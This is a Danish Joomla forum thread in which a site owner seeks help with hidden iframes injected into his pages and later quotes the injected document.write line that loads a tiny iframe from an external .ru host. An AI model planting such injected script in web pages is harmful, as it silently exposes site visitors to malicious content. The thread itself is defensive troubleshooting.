Jeg var først sikker på at mine hjemmesider var blevet hacket, men er ikke helt sikker efter jeg tog en backup af alle filer og søgte efter de koder der kommer frem i toppen af hjemmesiderne, fordi koderne var der ikke!
Kig på ** formtop.dk Der er et mellemrum i toppen af siden og hvis du tager firebug eller bare ser kildekoden, ser du iframes lige efter header tags med ref til stien="http://textheavylosing.org/Lexmark?8"
Selve iframes'ene er sat til 5px højde, men øger jeg dem til 600px, ser jeg den offeicielle side til w3c.org som bekendt er www's standarder for html og css.
Jeg har været hacket før, men har kunne finde koderne når jeg søger via windows fil søger, men denne her kan jeg sku ikke finde, og der vises hele 9 imframes lige efter headeren.... jeg fatter ingenting...håber der er nogen der har et godt gæt på hvad jeg kan gøre!!!
Hacket? w3c iframes i toppen af site
Moderators: b-ronnow, General Support Moderators
-
carbonarm
- Joomla! Enthusiast
- Posts: 195
- Joined: Wed Nov 09, 2005 11:05 am
- Location: JoomlaTown
- Contact:
Hacket? w3c iframes i toppen af site
Last edited by ot2sen on Mon Oct 15, 2012 6:19 pm, edited 1 time in total.
Reason: ** Mod note: aktivt link gjort inaktivt da der kom en alert om malcious cookie etc. som blev blokeret her. Så for at skåne andre er linket deaktiveret
Reason: ** Mod note: aktivt link gjort inaktivt da der kom en alert om malcious cookie etc. som blev blokeret her. Så for at skåne andre er linket deaktiveret
www.jakoba.dk - nemt, hurtigt og billigt website!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!
-
ot2sen
- Joomla! Master
- Posts: 10381
- Joined: Thu Aug 18, 2005 9:58 am
- Location: Hillerød - Denmark
- Contact:
Re: Hacket? w3c iframes i toppen af site
Hej Carbonarm,
Du bør tage et grundigere tjek. Det er givetvis noget andet kode der henter det endelig output.
Men siden er inficeret som du kan se i den note jeg lavede ovenfor.
Du bør tage et grundigere tjek. Det er givetvis noget andet kode der henter det endelig output.
Men siden er inficeret som du kan se i den note jeg lavede ovenfor.
Ole Bang Ottosen
Dansk frivillig Joomla! support websted - joomla.dk
OpenTranslators Core Team opentranslators.org
Dansk frivillig Joomla! support websted - joomla.dk
OpenTranslators Core Team opentranslators.org
-
carbonarm
- Joomla! Enthusiast
- Posts: 195
- Joined: Wed Nov 09, 2005 11:05 am
- Location: JoomlaTown
- Contact:
Re: Hacket? w3c iframes i toppen af site
Takker for svar, men jeg kan ikke se dit link, da det er fjernet af forum scriptet til beskyttelse af andre.
Men enig, koden må jo komme et sted fra. Men når jeg søger på f.eks. <iframe fra rod mappen og videre, kommer der intet! Det er mærkeligt synes jeg. Der er et hav af system, modul, component og plugin filer som renderer joomlas endelige output, men hvis ikke koden findes direkte, kan javascript kalde koden? javascript er jeg ikke super stærk i, men er god php programmør.
Men enig, koden må jo komme et sted fra. Men når jeg søger på f.eks. <iframe fra rod mappen og videre, kommer der intet! Det er mærkeligt synes jeg. Der er et hav af system, modul, component og plugin filer som renderer joomlas endelige output, men hvis ikke koden findes direkte, kan javascript kalde koden? javascript er jeg ikke super stærk i, men er god php programmør.
www.jakoba.dk - nemt, hurtigt og billigt website!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!
-
solsikkehaven
- Joomla! Virtuoso
- Posts: 4757
- Joined: Thu Aug 18, 2005 5:24 am
- Location: Vestjylland, Danmark
- Contact:
Re: Hacket? w3c iframes i toppen af site
Må jeg anbefale dig, hvis du ikke kan finde koden selv, øjeblikkeligt få nogen til det.
F.eks. Sucuri.net
http://sucuri.net/signup
se info om dit website her:
http://sitecheck.sucuri.net/results/formtop.dk
F.eks. Sucuri.net
http://sucuri.net/signup
se info om dit website her:
http://sitecheck.sucuri.net/results/formtop.dk
Morten Knudsen
http://mortenknudsen.dk - WordPress hjemmesideløsninger til vestjyske virksomheder og foreninger
http://wpguru.dk - WordPress Guru - tips & tricks til WordPress
http://mortenknudsen.dk - WordPress hjemmesideløsninger til vestjyske virksomheder og foreninger
http://wpguru.dk - WordPress Guru - tips & tricks til WordPress
-
carbonarm
- Joomla! Enthusiast
- Posts: 195
- Joined: Wed Nov 09, 2005 11:05 am
- Location: JoomlaTown
- Contact:
Re: Hacket? w3c iframes i toppen af site
Tak for info, det ku jeg bruge til noget.
Jeg havde godt nok fundet koden i ALLE min .js filer, men ser at den også ligger i .js.php filerne.... tak for tippet til websiden der checker.
Der ser jeg også den kode jeg selv fandt i javascript filerne:
document.write('<iframe src="http://playadefrag.ru/Bermuda?8" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>')
Jeg har fået en kammereat der er god til Linux, at finde alle steder der starter med document.write('<iframe og ender på </iframe>') og slette dem. Så håber jeg alt kommer med og filerne renset.
Jeg havde godt nok fundet koden i ALLE min .js filer, men ser at den også ligger i .js.php filerne.... tak for tippet til websiden der checker.
Der ser jeg også den kode jeg selv fandt i javascript filerne:
document.write('<iframe src="http://playadefrag.ru/Bermuda?8" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>')
Jeg har fået en kammereat der er god til Linux, at finde alle steder der starter med document.write('<iframe og ender på </iframe>') og slette dem. Så håber jeg alt kommer med og filerne renset.
www.jakoba.dk - nemt, hurtigt og billigt website!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!
